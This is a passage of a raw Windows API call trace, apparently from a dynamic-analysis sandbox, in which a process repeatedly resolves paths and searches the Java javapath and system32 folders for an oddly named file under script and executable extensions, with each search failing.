ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.182] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.182] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.VBS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.vbs"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.183] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.184] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.184] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.184] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.VBE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.vbe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.185] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.185] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.185] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.185] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.JS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.js"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.187] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.187] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.187] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.187] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.JSE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.jse"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.188] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.188] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.188] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.189] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.WSF" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.wsf"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.189] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.189] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.190] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.190] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.WSH" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.wsh"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.191] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.191] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.191] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.191] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.MSC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.msc"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.192] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.192] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.192] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.192] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.CPL" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.cpl"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.193] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.193] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.297] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.298] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.298] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.299] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.ps1" (normalized: "c:\\windows\\system32\\\x9f.ps1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.300] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.300] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.psm1" (normalized: "c:\\windows\\system32\\\x9f.psm1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.301] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.301] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.psd1" (normalized: "c:\\windows\\system32\\\x9f.psd1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, 